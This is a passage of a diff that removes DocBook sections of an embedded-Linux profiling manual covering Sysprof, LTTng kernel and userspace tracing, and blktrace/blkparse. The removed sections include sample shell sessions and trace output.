- <ulink url='http://sourceware.org/systemtap/langref/'>SystemTap Language Reference</ulink>
- </para>
-
- <para>
- Links to other SystemTap documents, tutorials, and examples can be
- found here:
- <ulink url='http://sourceware.org/systemtap/documentation.html'>SystemTap documentation page</ulink>
- </para>
- </section>
-</section>
-
-<section id='profile-manual-sysprof'>
- <title>Sysprof</title>
-
- <para>
- Sysprof is a very easy to use system-wide profiler that consists
- of a single window with three panes and a few buttons which allow
- you to start, stop, and view the profile from one place.
- </para>
-
- <section id='sysprof-setup'>
- <title>Setup</title>
-
- <para>
- For this section, we'll assume you've already performed the
- basic setup outlined in the General Setup section.
- </para>
-
- <para>
- Sysprof is a GUI-based application that runs on the target
- system. For the rest of this document we assume you've
- ssh'ed to the host and will be running Sysprof on the
- target (you can use the '-X' option to ssh and have the
- Sysprof GUI run on the target but display remotely on the
- host if you want).
- </para>
- </section>
-
- <section id='sysprof-basic-usage'>
- <title>Basic Usage</title>
-
- <para>
- To start profiling the system, you simply press the 'Start'
- button. To stop profiling and to start viewing the profile data
- in one easy step, press the 'Profile' button.
- </para>
-
- <para>
- Once you've pressed the profile button, the three panes will
- fill up with profiling data:
- </para>
-
- <para>
- <imagedata fileref="figures/sysprof-copy-to-user.png" width="6in" depth="4in" align="center" scalefit="1" />
- </para>
-
- <para>
- The left pane shows a list of functions and processes.
- Selecting one of those expands that function in the right
- pane, showing all its callees. Note that this caller-oriented
- display is essentially the inverse of perf's default
- callee-oriented callchain display.
- </para>
-
- <para>
- In the screenshot above, we're focusing on __copy_to_user_ll()
- and looking up the callchain we can see that one of the callers
- of __copy_to_user_ll is sys_read() and the complete callpath
- between them. Notice that this is essentially a portion of the
- same information we saw in the perf display shown in the perf
- section of this page.
- </para>
-
- <para>
- <imagedata fileref="figures/sysprof-copy-from-user.png" width="6in" depth="4in" align="center" scalefit="1" />
- </para>
-
- <para>
- Similarly, the above is a snapshot of the Sysprof display of a
- copy-from-user callchain.
- </para>
-
- <para>
- Finally, looking at the third Sysprof pane in the lower left,
- we can see a list of all the callers of a particular function
- selected in the top left pane. In this case, the lower pane is
- showing all the callers of __mark_inode_dirty:
- </para>
-
- <para>
- <imagedata fileref="figures/sysprof-callers.png" width="6in" depth="4in" align="center" scalefit="1" />
- </para>
-
- <para>
- Double-clicking on one of those functions will in turn change the
- focus to the selected function, and so on.
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> If you like sysprof's 'caller-oriented'
- display, you may be able to approximate it in other tools as
- well. For example, 'perf report' has the -g (--call-graph)
- option that you can experiment with; one of the options is
- 'caller' for an inverted caller-based callgraph display.
- </informalexample>
- </section>
-
- <section id='sysprof-documentation'>
- <title>Documentation</title>
-
- <para>
- There doesn't seem to be any documentation for Sysprof, but
- maybe that's because it's pretty self-explanatory.
- The Sysprof website, however, is here:
- <ulink url='http://sysprof.com/'>Sysprof, System-wide Performance Profiler for Linux</ulink>
- </para>
- </section>
-</section>
-
-<section id='lttng-linux-trace-toolkit-next-generation'>
- <title>LTTng (Linux Trace Toolkit, next generation)</title>
-
- <section id='lttng-setup'>
- <title>Setup</title>
-
- <para>
- For this section, we'll assume you've already performed the
- basic setup outlined in the General Setup section.
- LTTng is run on the target system by ssh'ing to it.
- </para>
- </section>
-
- <section id='collecting-and-viewing-traces'>
- <title>Collecting and Viewing Traces</title>
-
- <para>
- Once you've applied the above commits and built and booted your
- image (you need to build the core-image-sato-sdk image or use one of the
- other methods described in the General Setup section), you're
- ready to start tracing.
- </para>
-
- <section id='collecting-and-viewing-a-trace-on-the-target-inside-a-shell'>
- <title>Collecting and viewing a trace on the target (inside a shell)</title>
-
- <para>
- First, from the host, ssh to the target:
- <literallayout class='monospaced'>
- $ ssh -l root 192.168.1.47
- The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
- RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
- Are you sure you want to continue connecting (yes/no)? yes
- Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
- root@192.168.1.47's password:
- </literallayout>
- Once on the target, use these steps to create a trace:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng create
- Spawning a session daemon
- Session auto-20121015-232120 created.
- Traces will be written in /home/root/lttng-traces/auto-20121015-232120
- </literallayout>
- Enable the events you want to trace (in this case all
- kernel events):
- <literallayout class='monospaced'>
- root@crownbay:~# lttng enable-event --kernel --all
- All kernel events are enabled in channel channel0
- </literallayout>
- Start the trace:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng start
- Tracing started for session auto-20121015-232120
- </literallayout>
- And then stop the trace after awhile or after running
- a particular workload that you want to trace:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng stop
- Tracing stopped for session auto-20121015-232120
- </literallayout>
- You can now view the trace in text form on the target:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng view
- [23:21:56.989270399] (+?.?????????) sys_geteuid: { 1 }, { }
- [23:21:56.989278081] (+0.000007682) exit_syscall: { 1 }, { ret = 0 }
- [23:21:56.989286043] (+0.000007962) sys_pipe: { 1 }, { fildes = 0xB77B9E8C }
- [23:21:56.989321802] (+0.000035759) exit_syscall: { 1 }, { ret = 0 }
- [23:21:56.989329345] (+0.000007543) sys_mmap_pgoff: { 1 }, { addr = 0x0, len = 10485760, prot = 3, flags = 131362, fd = 4294967295, pgoff = 0 }
- [23:21:56.989351694] (+0.000022349) exit_syscall: { 1 }, { ret = -1247805440 }
- [23:21:56.989432989] (+0.000081295) sys_clone: { 1 }, { clone_flags = 0x411, newsp = 0xB5EFFFE4, parent_tid = 0xFFFFFFFF, child_tid = 0x0 }
- [23:21:56.989477129] (+0.000044140) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 681660, vruntime = 43367983388 }
- [23:21:56.989486697] (+0.000009568) sched_migrate_task: { 1 }, { comm = "lttng-consumerd", tid = 1193, prio = 20, orig_cpu = 1, dest_cpu = 1 }
- [23:21:56.989508418] (+0.000021721) hrtimer_init: { 1 }, { hrtimer = 3970832076, clockid = 1, mode = 1 }
- [23:21:56.989770462] (+0.000262044) hrtimer_cancel: { 1 }, { hrtimer = 3993865440 }
- [23:21:56.989771580] (+0.000001118) hrtimer_cancel: { 0 }, { hrtimer = 3993812192 }
- [23:21:56.989776957] (+0.000005377) hrtimer_expire_entry: { 1 }, { hrtimer = 3993865440, now = 79815980007057, function = 3238465232 }
- [23:21:56.989778145] (+0.000001188) hrtimer_expire_entry: { 0 }, { hrtimer = 3993812192, now = 79815980008174, function = 3238465232 }
- [23:21:56.989791695] (+0.000013550) softirq_raise: { 1 }, { vec = 1 }
- [23:21:56.989795396] (+0.000003701) softirq_raise: { 0 }, { vec = 1 }
- [23:21:56.989800635] (+0.000005239) softirq_raise: { 0 }, { vec = 9 }
- [23:21:56.989807130] (+0.000006495) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 330710, vruntime = 43368314098 }
- [23:21:56.989809993] (+0.000002863) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 1015313, vruntime = 36976733240 }
- [23:21:56.989818514] (+0.000008521) hrtimer_expire_exit: { 0 }, { hrtimer = 3993812192 }
- [23:21:56.989819631] (+0.000001117) hrtimer_expire_exit: { 1 }, { hrtimer = 3993865440 }
- [23:21:56.989821866] (+0.000002235) hrtimer_start: { 0 }, { hrtimer = 3993812192, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
- [23:21:56.989822984] (+0.000001118) hrtimer_start: { 1 }, { hrtimer = 3993865440, function = 3238465232, expires = 79815981000000, softexpires = 79815981000000 }
- [23:21:56.989832762] (+0.000009778) softirq_entry: { 1 }, { vec = 1 }
- [23:21:56.989833879] (+0.000001117) softirq_entry: { 0 }, { vec = 1 }
- [23:21:56.989838069] (+0.000004190) timer_cancel: { 1 }, { timer = 3993871956 }
- [23:21:56.989839187] (+0.000001118) timer_cancel: { 0 }, { timer = 3993818708 }
- [23:21:56.989841492] (+0.000002305) timer_expire_entry: { 1 }, { timer = 3993871956, now = 79515980, function = 3238277552 }
- [23:21:56.989842819] (+0.000001327) timer_expire_entry: { 0 }, { timer = 3993818708, now = 79515980, function = 3238277552 }
- [23:21:56.989854831] (+0.000012012) sched_stat_runtime: { 1 }, { comm = "lttng-consumerd", tid = 1193, runtime = 49237, vruntime = 43368363335 }
- [23:21:56.989855949] (+0.000001118) sched_stat_runtime: { 0 }, { comm = "lttng-sessiond", tid = 1181, runtime = 45121, vruntime = 36976778361 }
- [23:21:56.989861257] (+0.000005308) sched_stat_sleep: { 1 }, { comm = "kworker/1:1", tid = 21, delay = 9451318 }
- [23:21:56.989862374] (+0.000001117) sched_stat_sleep: { 0 }, { comm = "kworker/0:0", tid = 4, delay = 9958820 }
- [23:21:56.989868241] (+0.000005867) sched_wakeup: { 0 }, { comm = "kworker/0:0", tid = 4, prio = 120, success = 1, target_cpu = 0 }
- [23:21:56.989869358] (+0.000001117) sched_wakeup: { 1 }, { comm = "kworker/1:1", tid = 21, prio = 120, success = 1, target_cpu = 1 }
- [23:21:56.989877460] (+0.000008102) timer_expire_exit: { 1 }, { timer = 3993871956 }
- [23:21:56.989878577] (+0.000001117) timer_expire_exit: { 0 }, { timer = 3993818708 }
- .
- .
- .
- </literallayout>
- You can now safely destroy the trace session (note that
- this doesn't delete the trace - it's still there
- in ~/lttng-traces):
- <literallayout class='monospaced'>
- root@crownbay:~# lttng destroy
- Session auto-20121015-232120 destroyed at /home/root
- </literallayout>
- Note that the trace is saved in a directory of the same
- name as returned by 'lttng create', under the ~/lttng-traces
- directory (note that you can change this by supplying your
- own name to 'lttng create'):
- <literallayout class='monospaced'>
- root@crownbay:~# ls -al ~/lttng-traces
- drwxrwx--- 3 root root 1024 Oct 15 23:21 .
- drwxr-xr-x 5 root root 1024 Oct 15 23:57 ..
- drwxrwx--- 3 root root 1024 Oct 15 23:21 auto-20121015-232120
- </literallayout>
- </para>
- </section>
-
- <section id='collecting-and-viewing-a-userspace-trace-on-the-target-inside-a-shell'>
- <title>Collecting and viewing a userspace trace on the target (inside a shell)</title>
-
- <para>
- For LTTng userspace tracing, you need to have a properly
- instrumented userspace program. For this example, we'll use
- the 'hello' test program generated by the lttng-ust build.
- </para>
-
- <para>
- The 'hello' test program isn't installed on the rootfs by
- the lttng-ust build, so we need to copy it over manually.
- First cd into the build directory that contains the hello
- executable:
- <literallayout class='monospaced'>
- $ cd build/tmp/work/core2_32-poky-linux/lttng-ust/2.0.5-r0/git/tests/hello/.libs
- </literallayout>
- Copy that over to the target machine:
- <literallayout class='monospaced'>
- $ scp hello root@192.168.1.20:
- </literallayout>
- You now have the instrumented lttng 'hello world' test
- program on the target, ready to test.
- </para>
-
- <para>
- First, from the host, ssh to the target:
- <literallayout class='monospaced'>
- $ ssh -l root 192.168.1.47
- The authenticity of host '192.168.1.47 (192.168.1.47)' can't be established.
- RSA key fingerprint is 23:bd:c8:b1:a8:71:52:00:ee:00:4f:64:9e:10:b9:7e.
- Are you sure you want to continue connecting (yes/no)? yes
- Warning: Permanently added '192.168.1.47' (RSA) to the list of known hosts.
- root@192.168.1.47's password:
- </literallayout>
- Once on the target, use these steps to create a trace:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng create
- Session auto-20190303-021943 created.
- Traces will be written in /home/root/lttng-traces/auto-20190303-021943
- </literallayout>
- Enable the events you want to trace (in this case all
- userspace events):
- <literallayout class='monospaced'>
- root@crownbay:~# lttng enable-event --userspace --all
- All UST events are enabled in channel channel0
- </literallayout>
- Start the trace:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng start
- Tracing started for session auto-20190303-021943
- </literallayout>
- Run the instrumented hello world program:
- <literallayout class='monospaced'>
- root@crownbay:~# ./hello
- Hello, World!
- Tracing... done.
- </literallayout>
- And then stop the trace after awhile or after running a
- particular workload that you want to trace:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng stop
- Tracing stopped for session auto-20190303-021943
- </literallayout>
- You can now view the trace in text form on the target:
- <literallayout class='monospaced'>
- root@crownbay:~# lttng view
- [02:31:14.906146544] (+?.?????????) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 0, intfield2 = 0x0, longfield = 0, netintfield = 0, netintfieldhex = 0x0, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
- [02:31:14.906170360] (+0.000023816) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 1, intfield2 = 0x1, longfield = 1, netintfield = 1, netintfieldhex = 0x1, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
- [02:31:14.906183140] (+0.000012780) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 2, intfield2 = 0x2, longfield = 2, netintfield = 2, netintfieldhex = 0x2, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
- [02:31:14.906194385] (+0.000011245) hello:1424 ust_tests_hello:tptest: { cpu_id = 1 }, { intfield = 3, intfield2 = 0x3, longfield = 3, netintfield = 3, netintfieldhex = 0x3, arrfield1 = [ [0] = 1, [1] = 2, [2] = 3 ], arrfield2 = "test", _seqfield1_length = 4, seqfield1 = [ [0] = 116, [1] = 101, [2] = 115, [3] = 116 ], _seqfield2_length = 4, seqfield2 = "test", stringfield = "test", floatfield = 2222, doublefield = 2, boolfield = 1 }
- .
- .
- .
- </literallayout>
- You can now safely destroy the trace session (note that
- this doesn't delete the trace - it's still
- there in ~/lttng-traces):
- <literallayout class='monospaced'>
- root@crownbay:~# lttng destroy
- Session auto-20190303-021943 destroyed at /home/root
- </literallayout>
- </para>
- </section>
-
- </section>
-
- <section id='lltng-documentation'>
- <title>Documentation</title>
-
- <para>
- You can find the primary LTTng Documentation on the
- <ulink url='https://lttng.org/docs/'>LTTng Documentation</ulink>
- site.
- The documentation on this site is appropriate for intermediate to
- advanced software developers who are working in a Linux environment
- and are interested in efficient software tracing.
- </para>
-
- <para>
- For information on LTTng in general, visit the
- <ulink url='http://lttng.org/lttng2.0'>LTTng Project</ulink>
- site.
- You can find a "Getting Started" link on this site that takes
- you to an LTTng Quick Start.
- </para>
- </section>
-</section>
-
-<section id='profile-manual-blktrace'>
- <title>blktrace</title>
-
- <para>
- blktrace is a tool for tracing and reporting low-level disk I/O.
- blktrace provides the tracing half of the equation; its output can
- be piped into the blkparse program, which renders the data in a
- human-readable form and does some basic analysis:
- </para>
-
- <section id='blktrace-setup'>
- <title>Setup</title>
-
- <para>
- For this section, we'll assume you've already performed the
- basic setup outlined in the
- "<link linkend='profile-manual-general-setup'>General Setup</link>"
- section.
- </para>
-
- <para>
- blktrace is an application that runs on the target system.
- You can run the entire blktrace and blkparse pipeline on the
- target, or you can run blktrace in 'listen' mode on the target
- and have blktrace and blkparse collect and analyze the data on
- the host (see the
- "<link linkend='using-blktrace-remotely'>Using blktrace Remotely</link>"
- section below).
- For the rest of this section we assume you've ssh'ed to the
- host and will be running blkrace on the target.
- </para>
- </section>
-
- <section id='blktrace-basic-usage'>
- <title>Basic Usage</title>
-
- <para>
- To record a trace, simply run the 'blktrace' command, giving it
- the name of the block device you want to trace activity on:
- <literallayout class='monospaced'>
- root@crownbay:~# blktrace /dev/sdc
- </literallayout>
- In another shell, execute a workload you want to trace.
- <literallayout class='monospaced'>
- root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>; sync
- Connecting to downloads.yoctoproject.org (140.211.169.59:80)
- linux-2.6.19.2.tar.b 100% |*******************************| 41727k 0:00:00 ETA
- </literallayout>
- Press Ctrl-C in the blktrace shell to stop the trace. It will
- display how many events were logged, along with the per-cpu file
- sizes (blktrace records traces in per-cpu kernel buffers and
- simply dumps them to userspace for blkparse to merge and sort
- later).
- <literallayout class='monospaced'>
- ^C=== sdc ===
- CPU 0: 7082 events, 332 KiB data
- CPU 1: 1578 events, 74 KiB data
- Total: 8660 events (dropped 0), 406 KiB data
- </literallayout>
- If you examine the files saved to disk, you see multiple files,
- one per CPU and with the device name as the first part of the
- filename:
- <literallayout class='monospaced'>
- root@crownbay:~# ls -al
- drwxr-xr-x 6 root root 1024 Oct 27 22:39 .
- drwxr-sr-x 4 root root 1024 Oct 26 18:24 ..
- -rw-r--r-- 1 root root 339938 Oct 27 22:40 sdc.blktrace.0
- -rw-r--r-- 1 root root 75753 Oct 27 22:40 sdc.blktrace.1
- </literallayout>
- To view the trace events, simply invoke 'blkparse' in the
- directory containing the trace files, giving it the device name
- that forms the first part of the filenames:
- <literallayout class='monospaced'>
- root@crownbay:~# blkparse sdc
-
- 8,32 1 1 0.000000000 1225 Q WS 3417048 + 8 [jbd2/sdc-8]
- 8,32 1 2 0.000025213 1225 G WS 3417048 + 8 [jbd2/sdc-8]
- 8,32 1 3 0.000033384 1225 P N [jbd2/sdc-8]
- 8,32 1 4 0.000043301 1225 I WS 3417048 + 8 [jbd2/sdc-8]
- 8,32 1 0 0.000057270 0 m N cfq1225 insert_request
- 8,32 1 0 0.000064813 0 m N cfq1225 add_to_rr
- 8,32 1 5 0.000076336 1225 U N [jbd2/sdc-8] 1
- 8,32 1 0 0.000088559 0 m N cfq workload slice:150
- 8,32 1 0 0.000097359 0 m N cfq1225 set_active wl_prio:0 wl_type:1
- 8,32 1 0 0.000104063 0 m N cfq1225 Not idling. st->count:1
- 8,32 1 0 0.000112584 0 m N cfq1225 fifo= (null)
- 8,32 1 0 0.000118730 0 m N cfq1225 dispatch_insert
- 8,32 1 0 0.000127390 0 m N cfq1225 dispatched a request
- 8,32 1 0 0.000133536 0 m N cfq1225 activate rq, drv=1
- 8,32 1 6 0.000136889 1225 D WS 3417048 + 8 [jbd2/sdc-8]
- 8,32 1 7 0.000360381 1225 Q WS 3417056 + 8 [jbd2/sdc-8]
- 8,32 1 8 0.000377422 1225 G WS 3417056 + 8 [jbd2/sdc-8]
- 8,32 1 9 0.000388876 1225 P N [jbd2/sdc-8]
- 8,32 1 10 0.000397886 1225 Q WS 3417064 + 8 [jbd2/sdc-8]
- 8,32 1 11 0.000404800 1225 M WS 3417064 + 8 [jbd2/sdc-8]
- 8,32 1 12 0.000412343 1225 Q WS 3417072 + 8 [jbd2/sdc-8]
- 8,32 1 13 0.000416533 1225 M WS 3417072 + 8 [jbd2/sdc-8]
- 8,32 1 14 0.000422121 1225 Q WS 3417080 + 8 [jbd2/sdc-8]
- 8,32 1 15 0.000425194 1225 M WS 3417080 + 8 [jbd2/sdc-8]
- 8,32 1 16 0.000431968 1225 Q WS 3417088 + 8 [jbd2/sdc-8]
- 8,32 1 17 0.000435251 1225 M WS 3417088 + 8 [jbd2/sdc-8]
- 8,32 1 18 0.000440279 1225 Q WS 3417096 + 8 [jbd2/sdc-8]
- 8,32 1 19 0.000443911 1225 M WS 3417096 + 8 [jbd2/sdc-8]
- 8,32 1 20 0.000450336 1225 Q WS 3417104 + 8 [jbd2/sdc-8]
- 8,32 1 21 0.000454038 1225 M WS 3417104 + 8 [jbd2/sdc-8]
- 8,32 1 22 0.000462070 1225 Q WS 3417112 + 8 [jbd2/sdc-8]
- 8,32 1 23 0.000465422 1225 M WS 3417112 + 8 [jbd2/sdc-8]
- 8,32 1 24 0.000474222 1225 I WS 3417056 + 64 [jbd2/sdc-8]
- 8,32 1 0 0.000483022 0 m N cfq1225 insert_request
- 8,32 1 25 0.000489727 1225 U N [jbd2/sdc-8] 1
- 8,32 1 0 0.000498457 0 m N cfq1225 Not idling. st->count:1
- 8,32 1 0 0.000503765 0 m N cfq1225 dispatch_insert
- 8,32 1 0 0.000512914 0 m N cfq1225 dispatched a request
- 8,32 1 0 0.000518851 0 m N cfq1225 activate rq, drv=2
- .
- .
- .
- 8,32 0 0 58.515006138 0 m N cfq3551 complete rqnoidle 1
- 8,32 0 2024 58.516603269 3 C WS 3156992 + 16 [0]
- 8,32 0 0 58.516626736 0 m N cfq3551 complete rqnoidle 1
- 8,32 0 0 58.516634558 0 m N cfq3551 arm_idle: 8 group_idle: 0
- 8,32 0 0 58.516636933 0 m N cfq schedule dispatch
- 8,32 1 0 58.516971613 0 m N cfq3551 slice expired t=0
- 8,32 1 0 58.516982089 0 m N cfq3551 sl_used=13 disp=6 charge=13 iops=0 sect=80
- 8,32 1 0 58.516985511 0 m N cfq3551 del_from_rr
- 8,32 1 0 58.516990819 0 m N cfq3551 put_queue
-
- CPU0 (sdc):
- Reads Queued: 0, 0KiB Writes Queued: 331, 26,284KiB
- Read Dispatches: 0, 0KiB Write Dispatches: 485, 40,484KiB
- Reads Requeued: 0 Writes Requeued: 0
- Reads Completed: 0, 0KiB Writes Completed: 511, 41,000KiB
- Read Merges: 0, 0KiB Write Merges: 13, 160KiB
- Read depth: 0 Write depth: 2
- IO unplugs: 23 Timer unplugs: 0
- CPU1 (sdc):
- Reads Queued: 0, 0KiB Writes Queued: 249, 15,800KiB
- Read Dispatches: 0, 0KiB Write Dispatches: 42, 1,600KiB
- Reads Requeued: 0 Writes Requeued: 0
- Reads Completed: 0, 0KiB Writes Completed: 16, 1,084KiB
- Read Merges: 0, 0KiB Write Merges: 40, 276KiB
- Read depth: 0 Write depth: 2
- IO unplugs: 30 Timer unplugs: 1
-
- Total (sdc):
- Reads Queued: 0, 0KiB Writes Queued: 580, 42,084KiB
- Read Dispatches: 0, 0KiB Write Dispatches: 527, 42,084KiB
- Reads Requeued: 0 Writes Requeued: 0
- Reads Completed: 0, 0KiB Writes Completed: 527, 42,084KiB
- Read Merges: 0, 0KiB Write Merges: 53, 436KiB
- IO unplugs: 53 Timer unplugs: 1
-
- Throughput (R/W): 0KiB/s / 719KiB/s
- Events (sdc): 6,592 entries
- Skips: 0 forward (0 - 0.0%)
- Input file sdc.blktrace.0 added
- Input file sdc.blktrace.1 added
- </literallayout>
- The report shows each event that was found in the blktrace data,
- along with a summary of the overall block I/O traffic during
- the run. You can look at the
- <ulink url='http://linux.die.net/man/1/blkparse'>blkparse</ulink>
- manpage to learn the
- meaning of each field displayed in the trace listing.
- </para>
-
- <section id='blktrace-live-mode'>
- <title>Live Mode</title>
-
- <para>
- blktrace and blkparse are designed from the ground up to
- be able to operate together in a 'pipe mode' where the
- stdout of blktrace can be fed directly into the stdin of
- blkparse:
- <literallayout class='monospaced'>
- root@crownbay:~# blktrace /dev/sdc -o - | blkparse -i -
- </literallayout>
- This enables long-lived tracing sessions to run without
- writing anything to disk, and allows the user to look for
- certain conditions in the trace data in 'real-time' by
- viewing the trace output as it scrolls by on the screen or
- by passing it along to yet another program in the pipeline
- such as grep which can be used to identify and capture
- conditions of interest.
- </para>
-
- <para>
- There's actually another blktrace command that implements
- the above pipeline as a single command, so the user doesn't
- have to bother typing in the above command sequence:
- <literallayout class='monospaced'>
- root@crownbay:~# btrace /dev/sdc
- </literallayout>
- </para>
- </section>
-
- <section id='using-blktrace-remotely'>
- <title>Using blktrace Remotely</title>
-
- <para>
- Because blktrace traces block I/O and at the same time
- normally writes its trace data to a block device, and
- in general because it's not really a great idea to make
- the device being traced the same as the device the tracer
- writes to, blktrace provides a way to trace without
- perturbing the traced device at all by providing native
- support for sending all trace data over the network.
- </para>
-
- <para>
- To have blktrace operate in this mode, start blktrace on
- the target system being traced with the -l option, along with
- the device to trace:
- <literallayout class='monospaced'>
- root@crownbay:~# blktrace -l /dev/sdc
- server: waiting for connections...
- </literallayout>
- On the host system, use the -h option to connect to the
- target system, also passing it the device to trace:
- <literallayout class='monospaced'>
- $ blktrace -d /dev/sdc -h 192.168.1.43
- blktrace: connecting to 192.168.1.43
- blktrace: connected!
- </literallayout>
- On the target system, you should see this:
- <literallayout class='monospaced'>
- server: connection from 192.168.1.43
- </literallayout>
- In another shell, execute a workload you want to trace.
- <literallayout class='monospaced'>
- root@crownbay:/media/sdc# rm linux-2.6.19.2.tar.bz2; wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>; sync
- Connecting to downloads.yoctoproject.org (140.211.169.59:80)
- linux-2.6.19.2.tar.b 100% |*******************************| 41727k 0:00:00 ETA
- </literallayout>
- When it's done, do a Ctrl-C on the host system to
- stop the trace:
- <literallayout class='monospaced'>
- ^C=== sdc ===
- CPU 0: 7691 events, 361 KiB data
- CPU 1: 4109 events, 193 KiB data
- Total: 11800 events (dropped 0), 554 KiB data
- </literallayout>
- On the target system, you should also see a trace
- summary for the trace just ended:
- <literallayout class='monospaced'>
- server: end of run for 192.168.1.43:sdc
- === sdc ===
- CPU 0: 7691 events, 361 KiB data
- CPU 1: 4109 events, 193 KiB data
- Total: 11800 events (dropped 0), 554 KiB data
- </literallayout>
- The blktrace instance on the host will save the target
- output inside a hostname-timestamp directory:
- <literallayout class='monospaced'>
- $ ls -al
- drwxr-xr-x 10 root root 1024 Oct 28 02:40 .
- drwxr-sr-x 4 root root 1024 Oct 26 18:24 ..
- drwxr-xr-x 2 root root 1024 Oct 28 02:40 192.168.1.43-2012-10-28-02:40:56
- </literallayout>
- cd into that directory to see the output files:
- <literallayout class='monospaced'>
- $ ls -l
- -rw-r--r-- 1 root root 369193 Oct 28 02:44 sdc.blktrace.0
- -rw-r--r-- 1 root root 197278 Oct 28 02:44 sdc.blktrace.1
- </literallayout>
- And run blkparse on the host system using the device name:
- <literallayout class='monospaced'>
- $ blkparse sdc
-
- 8,32 1 1 0.000000000 1263 Q RM 6016 + 8 [ls]
- 8,32 1 0 0.000036038 0 m N cfq1263 alloced
- 8,32 1 2 0.000039390 1263 G RM 6016 + 8 [ls]
- 8,32 1 3 0.000049168 1263 I RM 6016 + 8 [ls]
- 8,32 1 0 0.000056152 0 m N cfq1263 insert_request
- 8,32 1 0 0.000061600 0 m N cfq1263 add_to_rr
- 8,32 1 0 0.000075498 0 m N cfq workload slice:300
- .
- .
- .
- 8,32 0 0 177.266385696 0 m N cfq1267 arm_idle: 8 group_idle: 0
- 8,32 0 0 177.266388140 0 m N cfq schedule dispatch
- 8,32 1 0 177.266679239 0 m N cfq1267 slice expired t=0
- 8,32 1 0 177.266689297 0 m N cfq1267 sl_used=9 disp=6 charge=9 iops=0 sect=56
- 8,32 1 0 177.266692649 0 m N cfq1267 del_from_rr
- 8,32 1 0 177.266696560 0 m N cfq1267 put_queue
-
- CPU0 (sdc):
- Reads Queued: 0, 0KiB Writes Queued: 270, 21,708KiB
- Read Dispatches: 59, 2,628KiB Write Dispatches: 495, 39,964KiB
- Reads Requeued: 0 Writes Requeued: 0
- Reads Completed: 90, 2,752KiB Writes Completed: 543, 41,596KiB
- Read Merges: 0, 0KiB Write Merges: 9, 344KiB
- Read depth: 2 Write depth: 2
- IO unplugs: 20 Timer unplugs: 1
- CPU1 (sdc):
- Reads Queued: 688, 2,752KiB Writes Queued: 381, 20,652KiB
- Read Dispatches: 31, 124KiB Write Dispatches: 59, 2,396KiB
- Reads Requeued: 0 Writes Requeued: 0
- Reads Completed: 0, 0KiB Writes Completed: 11, 764KiB
- Read Merges: 598, 2,392KiB Write Merges: 88, 448KiB
- Read depth: 2 Write depth: 2
- IO unplugs: 52 Timer unplugs: 0
-
- Total (sdc):
- Reads Queued: 688, 2,752KiB Writes Queued: 651, 42,360KiB
- Read Dispatches: 90, 2,752KiB Write Dispatches: 554, 42,360KiB
- Reads Requeued: 0 Writes Requeued: 0
- Reads Completed: 90, 2,752KiB Writes Completed: 554, 42,360KiB
- Read Merges: 598, 2,392KiB Write Merges: 97, 792KiB
- IO unplugs: 72 Timer unplugs: 1
-
- Throughput (R/W): 15KiB/s / 238KiB/s
- Events (sdc): 9,301 entries
- Skips: 0 forward (0 - 0.0%)
- </literallayout>
- You should see the trace events and summary just as
- you would have if you'd run the same command on the target.
- </para>
- </section>
-
- <section id='tracing-block-io-via-ftrace'>
- <title>Tracing Block I/O via 'ftrace'</title>
-
- <para>
- It's also possible to trace block I/O using only
- <link linkend='the-trace-events-subsystem'>trace events subsystem</link>,
- which can be useful for casual tracing
- if you don't want to bother dealing with the userspace tools.
- </para>
-
- <para>
- To enable tracing for a given device, use
- /sys/block/xxx/trace/enable, where xxx is the device name.
- This for example enables tracing for /dev/sdc:
- <literallayout class='monospaced'>
- root@crownbay:/sys/kernel/debug/tracing# echo 1 > /sys/block/sdc/trace/enable
- </literallayout>
- Once you've selected the device(s) you want to trace,
- selecting the 'blk' tracer will turn the blk tracer on:
- <literallayout class='monospaced'>
- root@crownbay:/sys/kernel/debug/tracing# cat available_tracers
- blk function_graph function nop
-
- root@crownbay:/sys/kernel/debug/tracing# echo blk > current_tracer
- </literallayout>
- Execute the workload you're interested in:
- <literallayout class='monospaced'>
- root@crownbay:/sys/kernel/debug/tracing# cat /media/sdc/testfile.txt
- </literallayout>
- And look at the output (note here that we're using
- 'trace_pipe' instead of trace to capture this trace -
- this allows us to wait around on the pipe for data to
- appear):
